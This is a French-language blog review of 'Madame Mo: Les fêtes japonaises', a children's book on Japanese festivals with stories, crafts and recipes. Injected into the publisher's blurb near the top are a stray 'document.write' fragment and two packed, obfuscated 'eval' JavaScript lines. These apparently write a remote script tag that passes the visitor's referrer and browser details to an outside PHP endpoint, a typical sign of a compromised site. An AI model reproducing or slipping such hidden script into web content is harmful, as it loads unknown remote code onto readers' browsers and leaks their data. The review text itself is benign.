Madame Mo: Les fêtes japonaises

“Yoko, document.write(“”); Norio, Plüq, Rose… tous les personnages de l’univers de Madame Mo nous entraînent dans un voyage culturel à travers le Japon et ses fêtes traditionnelles. Hina Matsuri, la fête des poupées en mars, O-tsukimi, la fête de la lune en septembre, Shichi-go-san, la fête des enfants en novembre… nous les suivons sur une année. Douze petites histoires faites de tranches de vie ou de souvenirs d’enfance nous immergent dans l’ambiance de la fête. Et pour prolonger ces moments joyeux, chaque histoire est accompagnée d’une activité manuelle simple et d’une recette. Un ouvrage riche et atypique pour lire et s’amuser à tous les âges !“
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|resht|var|u0026u|referrer|dhrkf||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hhada|var|u0026u|referrer|nshtz||js|php’.split(‘|’),0,{}))

[ Texte du
site de l’éditeur et de la couverture arrière ]

Continuez après le saut de page >>


Situé dans l’univers de Madame Mo, créé en 2003 par Agnès Lafaye et Pascale Moteki pour illustrer des objets inspirés de la tradition japonaise, ce livre pour enfants nous introduit aux fêtes japonaises. Il y a une fête pour chacun des mois de l’année et chacune nous est présentée à l’aide d’une petite histoire, d’une activité de bricolage et d’une recette. Ainsi, pour janvier, où l’on fête le nouvel an japonais (Oshogatsu), les auteurs nous racontent ce que les personnages font cette journée là, puis nous présente le jeu Fukuwarai (où les joueurs doivent épingler les différentes parties du visage (comme les yeux, les sourcils, le nez et la bouche) sur un dessin de face vierge) et une recette de Oyako don (Omelette au poulet sur bol de riz). Les fêtes pour le reste de l’année sont en février: chasser les mauvais esprits (Setsubun); mars: la fête des poupées (Hina Matsuri); avril: fête des cerisiers en fleur (Hanami); mai: la fête des garçons (Kodomo no Hi); juin: saison des pluies (Tsuyu); juillet: fête des étoiles (Tanabata Matsuri); août: fête des ancêtres (O-Bon); septembre: fête de la lune (O-Tsukimi); octobre: fête du sport dans les écoles (Undokai); novembre: fête des enfants (Shichi-go-san); et décembre: denier jour de l’année (O-Misoka).


Ce n’est pas le genre de livre que l’on lit d’un bout à l’autre mais plutôt une référence que l’on utilise pour introduire la culture japonaise aux enfants en leur lisant une histoire chaque mois et leur présentant des activités thématiques culinaires ou ludiques en relation avec la fête du mois. C’est une très bonne façon de développer la diversité culturelle des jeunes tout en s’amusant. Les illustrations sont simples et très colorés, mais le style des personnages de l’univers de Madame Mo est un peu excentrique (“personnages dotés d’une tête surdimensionnée avec un oeil plus grand que l’autre”). C’est un livre très amusant, riche en idées et en information.

Madame Mo: Les fêtes japonaises; Histoires, recettes et petits bricolages, écrit par Agnès Lafaye et illustré par Pascale Moteki. Arles, Éditions Philippe Picquier, avril 2013. 20 x 26 x 0,9 cm, 104 pg., 16,00 € / $27.95 Can. ISBN: 978-2-8097-0911-7. Recommandé pour les enfants de 7 à 12 ans.

Pour plus d’information vous pouvez consulter les sites suivants:

Madame Mo: Les fêtes japonaises © 2013, Éditions Philippe Picquier.

[ Translate ]

2 thoughts on “Madame Mo: Les fêtes japonaises

  1. Pingback: Index of book reviews | Clodjee's Safe-House

  2. Pingback: Bibliography | Clodjee's Safe-House

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s